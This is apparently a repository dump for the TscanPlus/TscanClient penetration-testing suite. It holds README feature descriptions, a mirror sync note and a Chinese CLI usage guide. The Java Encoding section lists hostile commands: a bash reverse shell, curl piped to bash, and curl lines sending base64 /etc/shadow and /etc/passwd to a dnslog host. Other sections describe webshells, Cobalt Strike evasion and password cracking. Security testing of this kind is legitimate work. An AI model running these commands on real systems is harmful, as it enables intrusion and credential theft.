**3. Encryption and Decryption**: AES encryption/decryption, RSA encryption/decryption, SM2 encryption/decryption, SM4 encryption/decryption, DES encryption/decryption, 3DES encryption/decryption, Xor encryption/decryption, RC4 encryption/decryption, Rabbit encryption/decryption, automatic RSA key generation, automatic SM2 key generation, etc.
<div align=center><img src=images/image-20240617180635476.png width=80% ></div>
<div align=center><img src=images/image-20240617180748714.png width=80% ></div>
**4. National Cryptography Algorithms**: SM2 elliptic curve asymmetric encryption algorithm, SM4 block symmetric encryption algorithm, SM3 cryptographic hash algorithm, and support for automatic SM2 key generation.
<div align=center><img src=images/image-20240617180836752.png width=80% ></div>
**5. Data Formatting**: JSON formatting and compression, XML formatting and compression, IP address and integer conversion, String.fromCharCode, Unix timestamp conversion, remove duplicate lines from text, letter case conversion, generate random strings, string reversal.
<div align=center><img src=images/image-20240617181019264.png width=80% ></div>
<div align=center><img src=images/image-20240617181053649.png width=80% ></div>
**6. Other**: JWT parsing and weak password detection, one-click decryption of all OA (Office Automation).
<div align=center><img src=images/image-20240617181132609.png width=80% ></div>
#### 11. Light Weaponry Library
##### 【Directory Enumeration】
Directory enumeration mainly targets web sites to enumerate directories. It supports dictionary mode, fuzzing mode, and live detection. The default method is HEAD, but GET is also supported.
**【Task Configuration】**
By default, the dictionary uses the built-in `dirsearch` dictionary, which contains approximately 9000 entries. It also supports extensions for asp, aspx, jsp, php, py, and more. When TideFuzz is enabled, it recursively fuzzes based on the enumeration results.
In fuzzing mode, you need to input fuzz metacharacters, which will generate a dictionary based on the fuzz length. However, be cautious, as the fuzz dictionary cannot be too large. If the dictionary exceeds 100,000 lines, a prompt will appear stating that the dictionary is too large and cannot be scanned.
Additional configuration options include setting timeout duration, retry attempts on timeout, interval time, URL concurrency, and directory thread count. You can also filter by file extensions and status codes.
**【Scan Results】**
The scan results will display the discovered URLs, status codes, body lengths, and more. You can select a specific entry to view the request and response packets.
At the bottom, it will show the number of alive targets, the number of successful enumerations, the detection queue status, the time taken, and other details.
<div align=center><img src=images/image-20240219111318207.png width=80% ></div>
##### 【UrlFinder】
The **URLFinder** feature is designed for fast and comprehensive extraction of target information. It is used to analyze the JavaScript and URLs within a page to uncover hidden sensitive information or unauthorized API endpoints.
**【Task Configuration】**
After entering the target address, you can select a mode:
- **Normal Mode**: By default, it crawls single-layer links.
- **Deep Mode**: Crawls links up to three layers deep, which takes relatively longer.
You can set the number of link layers to probe. The maximum number is limited to prevent unrestricted crawling.
The **"Only Show This Site"** option filters the URLs and JS results to show only relevant information from the current website. Additional configurations include the ability to set thread counts, and filter by file extensions, status codes, and keywords.
**【Scan Results】**
The scan results will display discovered URLs, status codes, body lengths, etc. If sensitive information is found, it will be shown in the **"Title || Sensitive Information"** column.
At the bottom, the scan results will show the number of alive targets, the number of successful enumerations, the detection queue status, time taken, and other related information.
- **Filter Rules**:
1. For pages that return the same length and status code, if they appear more than 5 times, they will no longer be displayed.
2. Additional features such as keyword filtering, length filtering, and custom suffix options are supported.
<div align=center><img src=images/image-20240327163203001.png width=80% ></div>
##### **【Host Collision】**
**Host Collision** works by modifying the Host field to send packets. This feature allows for IP and domain collision matching, which enables access to systems that are only accessible through specific hosts. With the increasing use of reverse proxy access via load balancers like Nginx, some internal and external domains might use the same load balancer for reverse proxying. This means that by modifying the Host header, access to internal systems might be possible.
<div align=center><img src=images/image-20240721003650858.png width=80% ></div>
---
##### **【40x Bypass】**
During penetration testing, its common to encounter assets that return 40x status codes (like 403, 404, etc.). Some of these pages can be bypassed using different techniques such as varying HTTP methods, referer manipulation, proxy IPs, modifying HTTP headers, or changing the case of characters in the URL. The **40x Bypass** detection feature integrates 8 common bypass methods and allows you to modify dictionary files under the `config/4xxBypass` directory.
<div align=center><img src=images/image-20240721005116585.png width=80% ></div>
---
##### **【JWT Decoding and Cracking】**
This feature allows for the encoding and decoding of JWTs, as well as cracking their secret keys. It supports a wide range of algorithms such as HS256, HS384, HS512, RS256, RS384, RS512, ES256, EDDSA, etc. It includes a built-in secret key dictionary with over 100,000 entries, and can crack keys in just 2 seconds.
<div align=center><img src=images/image-20240721010740227.png width=80% ></div>
---
##### **【IP Ownership Query】**
This feature automatically extracts and queries the physical address of assets like IP addresses and subdomains. It is integrated into IP scanning, URL probing, and subdomain enumeration to add the capability of IP ownership querying.
<div align=center><img src=images/image-20240721010957230.png width=80% ></div>
<div align=center><img src=images/image-20240721011103618.png width=80% ></div>
---
##### **【Proxy Pool Functionality】**
The **Proxy Pool** feature includes the following capabilities:
- Adding proxies
- Automatically crawling for proxies
- Switching proxy scenarios
- Proxy validation
- Proxy Listener management
When the **Proxy Listener** is enabled, it works with different proxy switching modes, polling, and cycling through all available proxies in the pool. These proxies can then be provided to TscanPlus or other external applications.
For detailed usage, you can refer to the documentation [【无影v2.6.5—代理池管理功能上线】](https://github.com/TideSec/TscanPlus/blob/main/%E6%97%A0%E5%BD%B1v2.6.5%E2%80%94%E4%BB%A3%E7%90%86%E6%B1%A0%E7%AE%A1%E7%90%86%E5%8A%9F%E8%83%BD%E4%B8%8A%E7%BA%BF.md)
<div align=center><img src=images/image-20241225095955306.png width=80% ></div>
#### **12. Red Team Commands**
TscanPlus includes commonly used Red Team commands, including:
- **26 types** of Windows internal network commands (credential gathering, persistence, lateral movement)
- **18 types** of Linux internal network commands
- **31 download commands**
- 85 reverse shell commands
- 21 MSF (Metasploit) generation commands
- CS (Cobalt Strike) evasion commands
These commands can be auto-generated based on shell type, operating system, and listener type.
---
##### **【Red Team Commands】**
- **Windows Internal Network**: Includes 26 types of commands for credential gathering, persistence, and lateral movement.
- **Linux Internal Network**: Includes 18 types of internal network commands.
<div align=center><img src=images/image-20231221142158055.png width=80% ></div>
---
##### **【Download Commands】**
TscanPlus has 31 built-in download commands that cover most of the methods used in internal network penetration testing. After configuring the URL address and target file name, the corresponding code can be automatically generated.
<div align=center><img src=images/image-20231221142332714.png width=80% ></div>
---
##### **【Webshell】**
TscanPlus includes a variety of basic one-liner web shells in different programming languages and some evasion web shells (e.g., IceScorpion, AntSword, Godzilla), for security personnel to refer to. These web shells can assist in penetration testing and web exploitation scenarios.
<div align=center><img src=images/image-20240830151318754.png width=80% ></div>
##### **【Java Encoding】**
Sometimes, using `Runtime.getRuntime().exec()` to execute a command payload can fail, especially when exploiting WebShells, deserialization vulnerabilities, or other attack vectors.
This failure often happens due to the way redirection and pipe characters are handled in the context of the process being launched. For example, `ls > dir_listing` should list the current directorys contents into a file called `dir_listing` when executed in a shell. However, within the `exec()` functions context, this command may be misinterpreted as a command to list the directory `>` and `dir_listing`.
In other cases, arguments containing spaces might be broken by the `StringTokenizer` class, which splits the string at spaces. For example, `ls "My Directory"` might get split and interpreted as `ls '"My' 'Directory"'`.
By utilizing **Base64 encoding**, the **Java Command Encoder** can help mitigate these issues. It allows for better handling of pipes and redirection by invoking Bash or PowerShell again and ensures that parameters with spaces are properly processed.
**Common Command List**:
```
bash -i >& /dev/tcp/127.0.0.1/6666 0>&1
ping `whoami`.key.dnslog.cn
curl http://www.google.com/bash.txt|bash
curl http://key.dnslog.cn/?r=`whoami`
curl http://key.dnslog.cn/?r=`cat /etc/shadow|base64`
curl http://key.dnslog.cn/?r=$(cat /etc/passwd|base64|tr '\n' '-')
curl http://www.google.com/key.txt
curl http://www.google.com/key.txt -O
curl http://www.google.com/key.txt -o key.txt
```
<div align=center><img src=images/image-20240111143548211.png width=80% ></div>
##### **【Reverse Shell】**
The Reverse Shell feature allows users to configure the target IP/Port, listener type, shell type, and whether to encode the command. Users can choose the desired command, and TscanPlus will automatically generate the corresponding reverse shell code. Common types of reverse shells include:
- **TCP Reverse Shell**
- **HTTP Reverse Shell**
- **DNS Reverse Shell**
- **PowerShell Reverse Shell**, etc.
This feature helps penetration testers establish a remote connection back to the attacker's machine for controlling the target system.
<div align=center><img src=images/image-20231221141826648.png width=80% ></div>
##### **【Cobalt Strike (CS) Payload】**
The CS (Cobalt Strike) payload feature allows users to input the CS Payload URL and automatically generate the corresponding code for Cobalt Strike. As a popular red team tool, Cobalt Strike supports various payload delivery methods, including reverse shell and Beacon. This feature helps generate code that meets the requirements for Cobalt Strike payload loading.
<div align=center><img src=images/image-20231221141838825.png width=80% ></div>
#### 13. Auxiliary Tools
TscanPlus also includes several useful auxiliary tools that help improve the efficiency and accuracy of penetration testing.
##### **【Asset Sorting】**
The Asset Sorting feature helps users extract and organize valuable information from large volumes of asset data. With a single click, users can quickly extract the main domain names, subdomains, IP addresses, URLs, and other data from assets. It also supports extracting results from Tscan/Fscan scans and offers two sorting modes: **Collapse Mode** and **C-Class Sorting**.
- **Collapse Mode**: This mode filters out assets with port numbers (e.g., `ip:port` or `domain:port`), leaving only subdomains and IP addresses that do not specify a port.
- **C-Class Sorting**: This mode categorizes IPs into C-Class networks, making it easier for users to group and manage IPs efficiently.
The Asset Sorting feature significantly simplifies the process of asset management and information extraction, enabling penetration testers to quickly identify potential attack targets.
<div align=center><img src=images/image-20240617181411005.png width=80% ></div>
##### **【Password Generation】**
TscanPlus offers three methods for generating passwords: **Social Engineering Dictionary Generation**, **Organizational Mode**, and **Enumeration Mode**. These methods allow users to generate more targeted dictionary files based on their specific needs.
<div align=center><img src=images/01.png width=80% ></div>
##### **【Password Query】**
TscanPlus includes a built-in database of **10,733 common default usernames and passwords** for various devices and products. Users can directly query and export these credentials for quick reference.
<div align=center><img src=images/02.png width=80% ></div>
##### **【Privilege Escalation Assistance】**
This feature queries unpatched vulnerabilities based on system information (`systeminfo`) and returns details about the vulnerabilities, including Microsoft vulnerability IDs, patch numbers, vulnerability descriptions, affected systems, and more.
<div align=center><img src=images/image-20231221142455293.png width=80% ></div>
##### **【Antivirus Software Query】**
Based on the `tasklist` information from Windows, TscanPlus matches running antivirus processes using a built-in set of **1,042 antivirus detection rules**. The tool returns details such as the process name, process ID, antivirus software name, and more.
<div align=center><img src=images/image-20231221142616501.png width=80% ></div>
#### 14. Other Features
##### **【Export Function】**
1. A new **Export to Excel** feature has been added across all modules. By default, the exported file will be saved in the programs root directory.
2. In all modules, users can sort and filter the content of all columns.
3. In all modules, multiple items can be selected or all items can be selected for batch operations, such as running POC tests, password cracking, directory enumeration, etc.
4. During the execution of the software, all discovered assets and threats will be saved in real-time. The saved data will be stored in the `result.txt` file located in the programs root directory.
<div align=center><img src=images/image-20240111144248390.png width=80% ></div>
<div align=center><img src=images/image-20240111144635519.png width=80% ></div>
##### **【Database Management】**
All data can be stored persistently and used across sessions. The default **database file** will be generated under the `config` folder.
<div align=center><img src=images/image-20240327165547238.png width=80% ></div>
##### **【Configuration Management】**
Configuration parameters for each function are written to configuration files. Once parameters are modified, executing the respective functionality once will save the changes to the configuration file, and there is no need to modify them again the next time.
<div align=center><img src=images/image-20240327165714901.png width=80% ></div>
Custom red team commands, online commands, default passwords, etc., can be added and saved to the configuration file.
<div align=center><img src=images/image-20240327165814782.png width=80% ></div>
##### **【Theme Settings】**
The system now includes a theme setting feature. By opening the "Advanced Configuration" on any page, users can configure the system theme and choose between dark or light modes. (This feature is based on the Wails framework, which works well on macOS, but there may be issues when applied on certain Windows systems.)
<div align=center><img src=images/image-20240327165922789.png width=80% ></div>
Comparison of dark and light themes on macOS.
<div align=center><img src=images/image-20240327172657687.png width=80% ></div>
##### **【Log Function】**
A logging feature has been added. The latest program logs are displayed in real-time on the right side of the About page. The log file is stored by default in the "Advanced Configuration" → "Export Directory" folder, and the file name is `TscanPlus-Result.txt`.
<div align=center><img src=images/image-20240830151748990.png width=80% ></div>
### Software Download
GitHub Download: [https://github.com/TideSec/TscanPlus/releases](https://github.com/TideSec/TscanPlus/releases)
Knowledge Planet: QR code below (for more and updated versions)
Some features are still being improved (such as the subdomain module, custom POC functionality, etc.), and the source code is not yet available. Currently, the Windows/macOS/Linux versions of TscanPlus are packaged and available for download.
The versions compiled are all for the x64_AMD architecture. If you need the x86 or ARM versions, they can be downloaded from the Knowledge Planet.
**Future updates and bug feedback will be promptly shared on the Knowledge Planet.**
<div align=center><img src=images/zsxq.png width=50% ></div>
### Acknowledgments
During the development of this tool, many well-known Go detection tools and fingerprint recognition software were referenced. We would like to express our gratitude to the following contributors:
- YHY's **ChYing** project: [https://github.com/yhy0/ChYing](https://github.com/yhy0/ChYing)
- qwtd's **Slack** project: [https://github.com/qiwentaidi/Slack](https://github.com/qiwentaidi/Slack)
- Shadow1ng's **fscan** project: [https://github.com/shadow1ng/fscan](https://github.com/shadow1ng/fscan)
- zhzyker's **dismap** project: [https://github.com/zhzyker/dismap](https://github.com/zhzyker/dismap)
- **ServerScan** project: [https://github.com/Adminisme/ServerScan](https://github.com/Adminisme/ServerScan)
### FAQ
#### **1. Key Authentication Issues**
1.1. Key authentication requires an internet connection (to poc.tidesec.com) only during the initial verification. Once verified successfully, no further internet connection is needed for re-validation.
1.2. Each key can only be used with one client. The authentication primarily relies on hardware identifiers such as network card serial numbers. Therefore, replacing hardware could result in authentication failure.
1.3. The purpose of key authentication is to facilitate the use and collection of POCs in a mutually beneficial cycle. "From the public, for the public." We encourage those who have POCs to submit them.
#### **2. macOS Installation Issues**
You may encounter several issues when executing the tool on macOS, such as "xxx is damaged and cannot be opened," "Apple cannot verify if xxx contains malicious software," or "xxx cannot be opened because it comes from an unidentified developer." The following articles can resolve about 95% of these issues:
- [Fixing the "Application is damaged and cannot be opened" error on macOS](https://sysin.org/blog/macos-if-crashes-when-opening/)
A common issue on macOS is the app crashing or quitting unexpectedly. To resolve this, execute the following command:
```bash
sudo xattr -r -d com.apple.quarantine TscanPlus_darwin_amd64_v1.0.app
```
If the problem persists, try this command:
```bash
sudo codesign --sign - --force --deep TscanPlus_darwin_amd64_v1.0.app
```
#### **3. Windows Dependency on WebView2 Environment**
**(1) System Lacks WebView2 Environment**
Programs packaged with Wails depend on [Microsoft WebView2](https://developer.microsoft.com/zh-cn/microsoft-edge/webview2/?form=MA13LH#download) when running on Windows.
By default, Windows 11 and Windows Server 2012 will have WebView2 installed, but some older machines (such as Windows Server 2008) may not. If the WebView2 environment is missing, the program will prompt you to download and install WebView2.
You can manually download WebView2 from here:
[Microsoft WebView2 Download](https://developer.microsoft.com/zh-cn/microsoft-edge/webview2/?form=MA13LH#download)
**(2) WebView2 Installed, But Error During Execution**
If you encounter the error message **"The WebView2 process crashed and the application needs to be restarted"** after execution:
<div align=center><img src=images/21.png width=50% ></div>
In this case, you need to uninstall the current WebView2 and then reinstall it. You can download the installer here:
[Microsoft WebView2 Download](https://developer.microsoft.com/zh-cn/microsoft-edge/webview2/?form=MA13LH#download)
**(3) Unable to Uninstall and Reinstall WebView2**
If WebView2 cannot be uninstalled, you can use a small tool called **【Windows11轻松设置](https://github.com/TideSec/TscanPlus/blob/main/soft/Windows11_Tools.7z)**.
<div align=center><img src=https://github.com/user-attachments/assets/3d950d77-a188-4bb2-b8e9-1b1f1acdb8d8 width=70% ></div>
<div align=center><img src=https://github.com/user-attachments/assets/5a4da4be-7d37-4c3b-af1e-193e43a74cad width=70% ></div>
Using this tool, you can completely uninstall WebView2 and then reinstall it.
**(4) Still Cannot Open After Reinstallation**
If, after reinstalling WebView2, the program still fails to open with no error message, the issue could be a bug resulting from an interaction between WebView2, certain versions of Windows, and the Wails `go-webview2` library. To resolve this, we have packaged an improved version specifically addressing the WebView2 issue. Please try using this version.
<div align=center><img src=https://github.com/user-attachments/assets/15d0c7f2-76c1-4359-8556-8f5232158f2b width=70% ></div>
<div align=center><img src=https://github.com/user-attachments/assets/f5a0bd0a-2c26-45f9-96e0-4471b7e0db83 width=70% ></div>
#### **4. Linux Version Running Errors**
The Linux version (AMD64 and Arm64) is compiled based on Kali 2023/2024 and has been tested to be compatible with Kali 2023 and later versions, as well as Ubuntu 22.04.
**Additionally, the Linux version needs to be executed in a desktop environment. It cannot run in a remote SSH session.**
For systems earlier than Ubuntu 22.04 and some Kali 2024.03, the following errors may occur:
**(1) Error: `libc.so.6: version 'GLIBC_2.34' not found`**
In this case, you need to install the `libc6` library. You can refer to this guide: [CSDN Article on Installing GLIBC](https://blog.csdn.net/huazhang_001/article/details/128828999).
**(2) Error: `libwebkit2gtk-4.0.so.37: cannot open shared object file`**
In this case, you need to install the `libwebkit2gtk` library. On Ubuntu, try executing:
```bash
apt-get install libwebkit2gtk-4.0-dev
```
If you encounter an error:
```
apt install libwebkit2gtk-4.0-dev
Error: Unable to locate package libwebkit2gtk-4.0-dev
Error: Couldn't find any package by glob 'libwebkit2gtk-4.0-dev'
```
You need to edit the sources list by running:
```bash
vi /etc/apt/sources.list
```
In the `/etc/apt/sources.list` file, add the following line:
```
deb http://gb.archive.ubuntu.com/ubuntu jammy main
```
Then, run the following commands:
```bash
apt update
apt install libwebkit2gtk-4.0-dev
```
If you get an error like:
```
Warning: GPG error: http://gb.archive.ubuntu.com/ubuntu jammy InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 871920D1991BC93C
```
You need to execute:
```bash
apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 871920D1991BC93C
```
(Note: Replace the key if necessary.)
Then, run:
```bash
apt update
```
If running `apt install libwebkit2gtk-4.0-dev` results in an error like:
```
libturbojpeg0 : conflicts: libjpeg-turbo8 but 2.1.2-0ubuntu1 is to be installed
E: Error, pkgProblemResolver ::Resolve generated breaks, this may be caused by held packages.
```
You need to run the following commands:
```bash
apt-get remove libjpeg-turbo8
apt-get remove libturbojpeg0
```
After that, execute `apt install libwebkit2gtk-4.0-dev` again. Once the installation is successful, you should be able to open the program normally.
After successfully installing `libwebkit2gtk-4.0-dev`, run the command:
```bash
apt list | grep libwebkit2gtk
```
You should see that the `libwebkit2gtk-4.0-dev` library has been successfully installed.
<div align=center><img src=images/image-20241218143353349.png width=50% ></div>
However, library dependency issues in Linux can be tricky. Its recommended to use Kali 2023 or later versions, as well as Ubuntu 22.04.
#### 5. Antivirus False Positives on Windows
The program is developed using Go, and the Windows version is packed with UPX. As a result, some antivirus software may flag it as a virus. If this happens, please perform a manual investigation and add an exception for the program.
#### 6. Unable to See the Top Tab Bar After Launch
A "Fullscreen" button has been added to the welcome page to make it easier for Windows users to maximize the application with a single click.
In some cases, after opening the program, users may only see the middle part of TscanPlus, and the top tab bar might not be visible. This issue is usually caused by low screen resolution or scaling settings. To resolve this, adjust the resolution to at least 1440x1080 and set the scaling to 100%.
#### 7. Reporting Bugs
For any other software bugs, please report them on the GitHub Issues page or the Knowledge Planet. These will be addressed and fixed in future updates.
### Star History
[![Star History Chart](https://api.star-history.com/svg?repos=TideSec/TscanPlus&type=Date)](https://star-history.com/#TideSec/TscanPlus&Date)
+12
View File
@@ -0,0 +1,12 @@
# Sync note
This Gitea repository is a **history-free default-branch snapshot** of:
https://github.com/TideSec/TscanPlus
## Layout
- `main`: README / docs / skill files (lightweight)
- **Release assets**: large binaries (`TscanPlus-v3.3.8`, `TscanClient-v2.9.5`, `soft`) and media under `images/` when uploaded
## Not a full mirror
No upstream git history, non-default branches, or tags.
Upstream `main` at import ls-remote: `f405040e50b71cf8d210e377f8bb7069fb883577`
+401
View File
@@ -0,0 +1,401 @@
# TscanClient
由于`无影(TscanPlus)`是基于`webview2`环境,所以在有些使用场景上相对受限,比如一些windows服务器或者linux命令行等,而且图形化占用资源相对较高,现在刚好正值`无影(TscanPlus)`正式版上线一年左右,Star数量恰好2k,应广大师傅需求便有了这版`TscanClient`
`TscanClient``无影(TscanPlus)`的命令行版本,保留了`无影(TscanPlus)`的核心功能,包括端口扫描、URL指纹识别、POC漏洞验证、弱口令破解、目录扫描、JS敏感信息收集、子域名枚举以及网络资产测绘等功能模块。
`TscanClient``无影(TscanPlus)`可以共享配置文件`config.yaml` 和数据库 `config.db`,且命令行版本能支持更多平台和系统,使用更加灵活便捷。
## 功能特点
- **多功能集成**:提供端口扫描、漏洞验证、弱口令检测等多种安全检测功能,一站式解决安全评估需求
- **高性能扫描**:采用高并发设计,支持大规模目标快速扫描(启发式扫描)
- **精准识别**:集成丰富的指纹库和POC库,准确识别Web应用和常见漏洞
- **可定制化**:支持自定义扫描策略,灵活配置扫描参数
- **跨平台兼容**:命令行版本支持更多操作系统平台,使用更加灵活
- **资源共享**:与TscanPlus共享配置文件和数据库,实现数据互通
- **友好输出**:结果展示清晰直观,支持分离进度条显示,方便结果分析
## 核心功能模块
TscanClient 包含以下八个核心功能模块:
1. 端口扫描
2. URL指纹识别
3. POC漏洞验证
4. 弱口令破解
5. 目录扫描
6. JS敏感信息收集
7. 子域名枚举
8. 网络资产测绘
## 适用场景
- 内网安全评估和资产梳理
- 外部渗透测试前的信息收集
- 企业安全基线检查
- 安全漏洞应急响应
- 自动化安全扫描流程
- 服务器环境下的批量扫描任务
## 参数详解与使用示例
### 各功能模块的使用
命令行格式:
```
TscanClient -m port,url,poc,crack,dir,js,domain,cyber [参数]
```
其中`-m`是最重要的功能选择参数,控制是否开启`端口扫描(port)、web探测(url)、Poc检测(poc)、密码破解(crack)、目录枚举(dir)、JS敏感信息(js)、子域名枚举(domain)、空间测绘(cyber)`八大功能。
<div align=center><img src=images/image-20250327204940289.png width=80% ></div>
多功能的联动等同于`无影(TscanPlus)`的项目管理,当八项功能都开启时,会以下面的流程进行检测,**前一项检测的所有结果都会输入给下一项检测作为输入**。
**空间测绘(cyber) -> 子域名枚举(domain) -> 端口扫描(port) -> 密码破解(crack) -> web探测(url) -> Poc检测(poc) -> 目录枚举(dir) -> JS敏感信息(js)**
**扫描结果:**
1、`TscanClient`在根目录下会产生`TscanClient.txt`的日志文件,包含所有的日志和过程结果
2、`TscanClient`还会将八大功能模块的结果分别存放在独立的txt文档中,方便结果查看。
3、`TscanClient`还会把所有结果保存到`config.db`中,该文件可以替换到`无影(TscanPlus)`的配置目录下,使用`无影(TscanPlus)`打开再利用。
除各单项功能外,最常用的几种组合模式:
1、端口扫描 `-m port,poc,crack`
2、web探测 `-m url,poc,dir,js`
3、子域名枚举 `-m domain,port,url,poc`
注意:`如果资产太多,尽量不要开启太多功能,以免耗时太久或耗尽CPU资源。 `
### 通用参数
| 参数 | 说明 | 默认值 |
|------------|-----------------------------------------------|-------------------|
| `-pr` | 项目名称,可自定义,方便在数据库中保存 | `Default` |
| `-m` | 任务模块,可选:port,url,poc,crack,dir,js,domain,cyber | `port,url,poc` |
| `-o` | 结果输出文件 | `TscanClient.txt` |
| `-no` | 禁用结果保存 | `false` |
| `-nocolor` | 禁用彩色输出 | `false` |
| `-proxy` | 设置HTTP或socks5代理,注:端口扫描只能使用socks5代理 | - |
**通用参数使用示例:**
```bash
# 使用默认端口进行ip扫描,同时开启指纹匹配poc和弱口令自动破解
TscanClient -h 192.168.1.1/24
# 对URL地址批量进行扫描,并进行poc检测和目录检测
TscanClient -m url,poc,dir,js -uf urls.txt
#对子域名进行枚举,并对发现的子域名进行端口扫描、poc检测、url指纹识别
TscanClient -m domain,port,url,poc -d example.com
# 指定项目名称并开启多个模块
TscanClient -pr MyProject -m port,url,poc -h 192.168.1.1
# 指定自定义输出文件
TscanClient -h 192.168.1.1 -o scan-results.txt
# 禁用彩色输出和结果保存
TscanClient -h 192.168.1.1 -nocolor -no
```
<div align=center><img src=images/image-20250327205113571.png width=80% ></div>
### 端口扫描参数(port模块)
| 参数 | 说明 | 默认值 |
| ---------- | --------------------------------------------------------- | ---------- |
| `-h` | 目标主机IP,例如: `192.168.1.1`,`192.168.1.1/24` | - |
| `-hn` | 排除的主机范围,例如: -hn `192.168.1.1/24` | - |
| `-p` | 端口配置,例如: `22``1-65535``22,80,3306` | Top100端口 |
| `-pa` | 在默认端口基础上添加端口,`-pa 3389` | - |
| `-hf` | 主机列表文件 | - |
| `-portf` | 端口列表文件 | - |
| `-t` | 线程数量 | `600` |
| `-nosmart` | 禁用启发式大网段探测(默认针对C段以上CIDR启用启发式扫描) | `false` |
| `-si` | 设置启发式扫描时要探测的ip | `1,254` |
| `-sp` | 设置启发式扫描时端口探针 | `icmp,80` |
| `-time` | 超时时间(秒) | `3` |
| `-np` | 禁用存活探测 | `false` |
**端口扫描使用示例:**
```bash
# 扫描主机,使用默认端口和线程
TscanClient -m port -h 192.168.1.1/24
# 扫描单个主机的指定端口
TscanClient -m port -h 192.168.1.1 -p 80,443,3306
# 扫描C段网络上的常用Web端口,设置更高线程数
TscanClient -m port -h 192.168.1.0/24 -p 80,443,8080,8443 -t 1000
# 使用主机列表文件进行扫描
TscanClient -m port -hf hosts.txt -p 22,80,443
# 在默认端口基础上添加自定义端口
TscanClient -m port -h 192.168.1.1 -pa 8080,9000
```
<div align=center><img src=images/image-20250328090134831.png width=80% ></div>
### Web应用扫描参数(url模块)
| 参数 | 说明 | 默认值 |
|-----------|---------------------------------------|--------|
| `-u` | 目标URL | - |
| `-uf` | URL列表文件 | - |
| `-cookie` | 设置Cookie | - |
| `-wt` | Web请求超时时间 | `10` |
| `-proxy` | 设置HTTP或socks5代理 | - |
| `-finger` | 设置web指纹策略,例如:-finger min 或 tiny 或 all | `tiny` |
**Web应用扫描使用示例:**
```bash
# 指定URL进行Web指纹识别
TscanClient -m url -u http://example.com
# 从文件加载URL列表并选择全量指纹
TscanClient -m url,poc -uf urls.txt -finger all
# 设置Cookie进行认证扫描
TscanClient -m url -u http://example.com -cookie "session=123456"
# 通过代理进行扫描
TscanClient -m url,poc -u http://example.com -proxy http://127.0.0.1:8080
# 增加Web请求超时时间
TscanClient -m url,poc -u http://example.com -wt 10
```
<div align=center><img src=images/image-20250327205210338.png width=80% ></div>
### POC漏洞验证参数(poc模块)
| 参数 | 说明 | 默认值 |
|-------------|--------------------------------------------|-------------|
| `-u` | 目标URL | - |
| `-uf` | URL列表文件 | - |
| `-pocpath` | POC文件路径,和`无影(TscanPlus)`一样,仅支持`xray 1.0`格式的Poc | - |
| `-pocname` | 使用包含指定名称的POC,例如: `-pocname weblogic` | - |
| `-full` | 不匹配指纹,完整POC扫描,默认匹配指纹后检测poc | `false` |
| `-num` | POC并发数 | `20` |
| `-poclevel` | 设置使用的POC级别,默认1+2+3+4+5 | `1+2+3+4+5` |
| `-poclist` | 打印所有POC列表 | `false` |
| `-pd` | 当poc检测成功时显示数据包 | `false` |
**POC漏洞验证使用示例:**
```bash
# 对目标进行默认POC验证
TscanClient -m poc -u http://example.com
# 使用指定POC检测漏洞,在检测到Poc时打印请求和响应数据包
TscanClient -m poc -uf url.txt -pocname weblogic -pd
# 使用自定义POC路径
TscanClient -m poc -uf url.txt -pocpath /path/to/pocs
# poc不匹配指纹,会检测所有内置poc
TscanClient -m poc -u http://example.com -full
# 调整POC并发数和级别
TscanClient -m poc -u http://example.com -num 50 -poclevel 1+2
# 打印所有可用POC列表
TscanClient -poclist
```
<div align=center><img src=images/image-20250327205334302.png width=80% ></div>
### 弱口令检测参数(crack模块)
| 参数 | 说明 | 默认值 |
|----------|----------------------------|----------|
| `-h` | 目标ip | - |
| `-hf` | ip列表文件 | - |
| `-br` | 密码爆破线程数 | `1` |
| `-s` | 暴力破解的服务,例如: -s ssh,mysql | `all` |
| `-user` | 用户名,不指定时使用内置字典 | - |
| `-pwd` | 密码,不指定时使用内置字典 | - |
| `-c` | 执行命令(支持ssh、wmiexec、mysql等) | `whoami` |
| `-userf` | 用户名字典文件 | - |
| `-pwdf` | 密码字典文件 | - |
**弱口令检测使用示例:**
```bash
# 对SSH服务进行弱口令检测
TscanClient -m crack -h 192.168.1.1 -p 22 -s ssh
# 使用自定义字典进行MySQL密码破解
TscanClient -m crack -hf ip.txt -p 3306 -s mysql -userf users.txt -pwdf pass.txt
# 增加爆破线程数
TscanClient -m crack -h 192.168.1.1 -p 3389 -s rdp -br 5
# 指定用户名和密码进行爆破
TscanClient -m crack -h 192.168.1.1 -p 22 -s ssh -user root,admin -pwd 123456,password
# 爆破成功后执行命令
TscanClient -m crack -h 192.168.1.1 -p 22 -s ssh -c "id"
```
<div align=center><img src=images/image-20250327205625564.png width=80% ></div>
### 子域名枚举参数(domain模块)
| 参数 | 说明 | 默认值 |
|--------|-------------------|---------|
| `-d` | 域名枚举目标,支持逗号分隔 | - |
| `-df` | 域名枚举目标文件 | - |
| `-dc` | 域名枚举字典,需完整绝对路径 | - |
| `-api` | 域名枚举是否使用API,默认不启用 | `false` |
**子域名枚举使用示例:**
**子域名枚举时默认是开启API查询的,但API的key需要在`config.yaml`文件中手动配置,也可把`无影(TscanPlus)`的配置文件拷贝过来直接使用。
**
```bash
# 对单个域名进行子域名枚举
TscanClient -m domain -d example.com
# 对多个域名进行子域名枚举,并启用api检索,api的key需自行在config.yaml文件中配置
TscanClient -m domain -d example.com,example.org -api
# 使用自定义字典进行子域名枚举
TscanClient -m domain -df domains.txt -dc /path/to/subdomains.txt
# 子域名枚举后进行指纹识别和漏洞扫描
TscanClient -m domain,url,poc -d example.com
```
<div align=center><img src=images/image-20250327205708209.png width=80% ></div>
### 目录扫描参数(dir模块)
| 参数 | 说明 | 默认值 |
|------|------------------------------|-----|
| `-u` | URL地址 | - |
| `-uf` | URL列表文件 | - |
| `-ds` | 目录枚举线程设置 | 20 |
| `-dd` | 目录枚举字典,需完整绝对路径,不指定时使用内置10k字典 | - |
**目录扫描使用示例:**
```bash
# 对目标URL进行目录扫描
TscanClient -m dir -u http://example.com
# 使用自定义字典进行目录扫描
TscanClient -m dir -u http://example.com -dd /path/to/dirlist.txt
# 设置目录扫描线程数
TscanClient -m dir -u http://example.com -ds 50
```
<div align=center><img src=images/image-20250327205753599.png width=80% ></div>
### JS敏感信息收集(js模块)
| 参数 | 说明 | 默认值 |
|-----------|-----------------|------|
| `-u` | 目标URL | - |
| `-uf` | URL列表文件 | - |
| `-cookie` | 设置Cookie | - |
| `-wt` | Web请求超时时间 | `10` |
| `-proxy` | 设置HTTP或socks5代理 | - |
**JS敏感信息收集使用示例:**
```bash
